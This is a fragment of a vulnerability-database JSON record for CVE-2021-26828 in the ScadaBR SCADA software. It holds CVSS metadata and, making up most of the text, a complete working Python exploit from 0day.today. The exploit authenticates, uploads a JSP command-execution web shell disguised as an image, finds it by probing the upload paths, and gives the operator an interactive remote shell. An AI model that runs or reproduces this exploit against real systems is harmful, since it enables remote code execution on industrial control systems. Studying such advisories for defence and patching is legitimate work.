"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T12:15:00", "type": "cve", "title": "CVE-2021-26828", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26828"], "modified": "2021-06-21T18:47:00", "cpe": ["cpe:/a:openplcproject:scadabr:0.9.1", "cpe:/a:openplcproject:scadabr:1.12.4"], "id": "CVE-2021-26828", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26828", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openplcproject:scadabr:0.9.1:*:*:*:*:linux:*:*", "cpe:2.3:a:openplcproject:scadabr:1.12.4:*:*:*:*:windows:*:*"]}], "zdt": [{"lastseen": "2021-12-22T21:17:26", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-13T00:00:00", "type": "zdt", "title": "ScadaBR 1.0 / 1.1CE Windows Shell Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26828"], "modified": "2021-05-13T00:00:00", "id": "1337DAY-ID-36243", "href": "https://0day.today/exploit/description/36243", "sourceData": "#!/usr/bin/python\n\n# Exploit Title: Authenticated Arbitrary File Upload (Remote Code Execution)\n# Exploit Author: Fellipe Oliveira\n# Vendor Homepage: https://www.scadabr.com.br/ \n# Software Link: https://www.scadabr.com.br/ \n# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux\n# Tested on: Windows7, Windows10\n# CVE : CVE-2021-26828\n\nimport requests,sys,time\n\n\nif len(sys.argv) <=4:\n print('[x] Missing arguments ... ')\n print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>')\n print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin')\n sys.exit(0)\nelse: \n time.sleep(1)\n\n\nhost = sys.argv[1]\nport = sys.argv[2]\nuser = sys.argv[3]\npassw = sys.argv[4]\n\nflag = False\nLOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'\nPROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'\n\n\nbanner = '''\n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+\n| _________ .___ ____________________ |\n| / _____/ ____ _____ __| _/____ \\______ \\______ \\ |\n| \\_____ \\_/ ___\\\\__ \\ / __ |\\__ \\ | | _/| _/ |\n| / \\ \\___ / __ \\_/ /_/ | / __ \\| | \\| | \\ |\n| /_______ /\\___ >____ /\\____ |(____ /______ /|____|_ / |\n| \\/ \\/ \\/ \\/ \\/ \\/ \\/ |\n| |\n| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload (CVE-2021-26828) |\n| > Exploit Author : Fellipe Oliveira |\n| > Exploit for Windows Systems |\n+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+\n'''\n\ndef main():\n payload = {\n 'username': user,\n 'password': passw\n }\n\n print(banner)\n time.sleep(2)\n \n with requests.session() as s:\n s.post(LOGIN, data=payload)\n response = s.get(PROTECTED_PAGE)\n\n print(\"[+] Trying to authenticate \"+LOGIN+\"...\")\n if response.status_code == 200:\n print(\"[+] Successfully authenticated! :D~\\n\")\n time.sleep(2)\n else:\n print(\"[x] Authentication failed :(\")\n sys.exit(0)\n\n burp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\"\n burp0_cookies = {\"JSESSIONID\": \"66E47DFC053393AFF6C2D5A7C15A9439\"}\n burp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------6150838712847095098536245849\", \"Origin\": \"http://\"+host+\":\"+port+\"/\", \"Connection\": \"close\", \"Referer\": \"http://\"+host+\":\"+port+\"/ScadaBR/view_edit.shtm\", \"Upgrade-Insecure-Requests\": \"1\"}\n burp0_data = \"-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"view.name\\\"\\r\\n\\r\\n\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"view.xid\\\"\\r\\n\\r\\nGV_218627\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"backgroundImageMP\\\"; filename=\\\"win_cmd.jsp\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n<%@ page import=\\\"java.util.*,java.io.*\\\"%>\\n<%\\n%>\\n<HTML><BODY>\\nCommands with JSP\\n<FORM METHOD=\\\"GET\\\" NAME=\\\"myform\\\" ACTION=\\\"\\\">\\n<INPUT TYPE=\\\"text\\\" NAME=\\\"cmd\\\">\\n<INPUT TYPE=\\\"submit\\\" VALUE=\\\"Send\\\">\\n</FORM>\\n<pre>\\n<%\\nif (request.getParameter(\\\"cmd\\\") != null) {\\n out.println(\\\"Command: \\\" + request.getParameter(\\\"cmd\\\") + \\\"<BR>\\\");\\n Process p;\\n if ( System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n p = Runtime.getRuntime().exec(\\\"cmd.exe /C \\\" + request.getParameter(\\\"cmd\\\"));\\n }\\n else{\\n p = Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\"));\\n }\\n OutputStream os = p.getOutputStream();\\n InputStream in = p.getInputStream();\\n DataInputStream dis = new DataInputStream(in);\\n String disr = dis.readLine();\\n while ( disr != null ) {\\n out.println(disr);\\n disr = dis.readLine();\\n }\\n}\\n%>\\n</pre>\\n</BODY></HTML>\\n\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"upload\\\"\\r\\n\\r\\nUpload image\\r\\n-----------------------------6150838712847095098536245849\\r\\nContent-Disposition: form-data; name=\\\"view.anonymousAccess\\\"\\r\\n\\r\\n0\\r\\n-----------------------------6150838712847095098536245849--\\r\\n\"\n getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)\n\n print('[>] Attempting to upload .jsp Webshell...')\n time.sleep(1)\n print('[>] Verifying shell upload...\\n')\n time.sleep(2)\n \n if getdata.status_code == 200:\n print('[+] Upload Successfuly!')\n \n for num in range(1,500): \n PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)\n find = s.get(PATH)\n\n if find.status_code == 200: \n print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))\n flag = True\n print('[>] Spawning fake shell...') \n time.sleep(3) \n\n while flag:\n param = raw_input(\"# \")\n burp0_url = \"http://\"+host+\":\"+port+\"/ScadaBR/uploads/%d.jsp?cmd=%s\" % (num,param)\n burp0_cookies = {\"JSESSIONID\": \"4FCC12402B8389A64905F4C8272A64B5\"}\n burp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+host+\":\"+port+\"/ScadaBR/uploads/%d.jsp?cmd=%s\", \"Upgrade-Insecure-Requests\": \"1\"}\n send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) \n clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('\"GET\" NAME=\"myform\" ACTION=\"\">', '').replace('Commands with JSP', '').replace('<INPUT TYPE=\"text\" NAME=\"cmd\">', '').replace('<INPUT TYPE=\"submit\" VALUE=\"Send\">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '')\n print(clean)\n\n elif num == 499:\n print('[x] Webshell not Found')\n \n else:\n print('Reason:'+getdata.reason+' ') \n print('Exploit Failed x_x')\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36243", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

ScadaBR 1.0 / 1.1CE Linux Shell Upload Exploit

Description

Related